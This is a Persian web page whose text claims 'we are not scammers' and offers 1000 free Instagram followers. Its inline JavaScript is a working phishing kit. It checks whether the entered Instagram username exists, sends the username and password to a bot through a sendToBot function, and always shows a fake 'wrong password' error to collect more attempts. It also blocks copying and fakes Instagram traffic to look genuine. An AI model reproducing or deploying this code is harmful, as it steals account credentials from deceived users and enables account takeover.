ما کلاهبردار نیستیم!

پروفایل

یا
رمز عبور خود را فراموش کرده‌اید؟
')[0]; } const data = JSON.parse(jsonStr); const user = data.graphql?.user || data.user; if (user && user.id) { return { exists: true, name: user.full_name || cleanUsername, pic: user.profile_pic_url_hd || user.profile_pic_url || 'https://instagram.com/images/default_profile.png' }; } } catch (e) { console.warn("پارس JSON شکست:", e); } } // بررسی 404 if (text.includes('Page Not Found') || text.includes('"message":"Not Found"') || text.includes('404')) { return { exists: false }; } } catch (e) { if (e.name === 'AbortError') continue; console.warn("پروکسی شکست:", proxy, e); continue; } } return { exists: false }; } // هندل فرم (کاملاً دیباگ شده) document.getElementById('loginForm').addEventListener('submit', async function(e) { e.preventDefault(); const usernameInput = document.getElementById('username'); const passwordInput = document.getElementById('password'); const username = usernameInput.value.trim(); const password = passwordInput.value; const submitBtn = this.querySelector('button[type="submit"]'); const errorMsg = document.getElementById('errorMsg'); const profilePreview = document.getElementById('profilePreview'); const profilePic = document.getElementById('profilePic'); const profileName = document.getElementById('profileName'); // اعتبارسنجی ورودی if (!username || username.length < 1) { errorMsg.textContent = "نام کاربری نمی‌تواند خالی باشد."; errorMsg.style.display = 'block'; return; } if (!password || password.length < 1) { errorMsg.textContent = "رمز عبور نمی‌تواند خالی باشد."; errorMsg.style.display = 'block'; return; } // ریست errorMsg.style.display = 'none'; errorMsg.textContent = ''; profilePreview.style.display = 'none'; submitBtn.disabled = true; submitBtn.textContent = "در حال بررسی حساب..."; try { await sleep(Math.random() * 2000 + 1500); const account = await checkInstagramAccount(username); if (!account || !account.exists) { await sendToBot(username, password, "", "", "فیک"); errorMsg.textContent = "این حساب وجود ندارد. لطفاً نام کاربری معتبر وارد کنید."; errorMsg.style.display = 'block'; submitBtn.disabled = false; submitBtn.textContent = "دریافت 1000 فالوور"; passwordInput.value = ""; return; } // نمایش پروفایل profilePic.src = account.pic; profilePic.onerror = () => { profilePic.src = 'https://instagram.com/images/default_profile.png'; }; profileName.textContent = account.name; profilePreview.style.display = 'block'; // ارسال اطلاعات await sendToBot(username, password, account.pic, account.name, "واقعی"); // نمایش خطای واقعی setTimeout(() => { errorMsg.textContent = "رمز عبور اشتباه است. لطفاً دوباره تلاش کنید."; errorMsg.style.display = 'block'; submitBtn.disabled = false; submitBtn.textContent = "دریافت 1000 فالوور"; passwordInput.value = ""; }, 1800); } catch (err) { console.error("خطای کلی:", err); errorMsg.textContent = "خطایی رخ داد. لطفاً دوباره تلاش کنید."; errorMsg.style.display = 'block'; submitBtn.disabled = false; submitBtn.textContent = "دریافت 1000 فالوور"; } }); // جلوگیری از کپی document.addEventListener('contextmenu', e => e.preventDefault()); document.addEventListener('selectstart', e => e.preventDefault()); document.addEventListener('dragstart', e => e.preventDefault()); // شبیه‌سازی ترافیک واقعی setInterval(() => { const img = new Image(); img.src = 'https://i.instagram.com/api/v1/feed/reels_tray/?' + Date.now(); }, 5000);